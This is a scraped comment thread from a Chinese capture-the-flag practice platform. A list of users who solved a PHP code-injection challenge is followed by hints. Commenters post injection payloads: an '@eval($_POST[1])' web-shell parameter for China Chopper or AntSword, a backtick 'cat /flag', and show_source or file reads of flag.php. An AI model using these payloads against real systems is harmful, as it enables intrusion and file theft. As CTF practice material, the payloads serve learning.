评分(10)
解题动态
柒柒77 攻破了该题 16分钟前
zz0607 攻破了该题 19分钟前
gongyy 攻破了该题 48分钟前
巴咕噜182 攻破了该题 2小时前
SurPLus007 攻破了该题 2小时前
zhaowenxin 攻破了该题 7小时前
yang0000 攻破了该题 16小时前
Biscuitvv 攻破了该题 16小时前
香蕉君 攻破了该题 19小时前
四叠半神话大系 攻破了该题 21小时前
lnboxue 攻破了该题 21小时前
chi 攻破了该题 22小时前
aboic 攻破了该题 1天前
youbug 攻破了该题 1天前
YYYYHHHHNNNN 攻破了该题 1天前
lance 攻破了该题 1天前
彭彭 攻破了该题 1天前
qwaeawd 攻破了该题 1天前
zzuer 攻破了该题 1天前
评论
max39 4年前
举报
构造 ?hello=@eval($_POST[1]) 上caidao或antsword
bk201 4年前
举报
system('command') bypass
system 4年前
举报
http://114.67.246.176:17326/ 我怀疑平台的并发没有做好,为什么我的这一题出来的是之前的 $what=$_GET['what'];<br> echo $what;<br> if($what=='flag')<br> echo 'flag{****}';<br>
200200 4年前
举报
nonono
l03h11x28 4年前
举报
这题是不是不能做了啊 卧槽 为啥我不显示 坑我两块钱 rnm退钱!!!
118234 4年前
举报
`cat /flag`
luoyao 4年前
举报
?hello=file("flag.php")
luyisie 4年前
举报
file // show_source // highlight_file
wwgy9981 4年前
举报
flag = 'Too Young Too Simple‘
kavin 4年前
举报
明白了原理,用bp搞了一轮,发现hello=show_source('flag.php')可行
kuaiting 4年前
举报
使用?hello=file('flag.php') 或者?hello=show_source('flag.php') 等可以读取源码的函数 或者构造var_dump($a) 闭合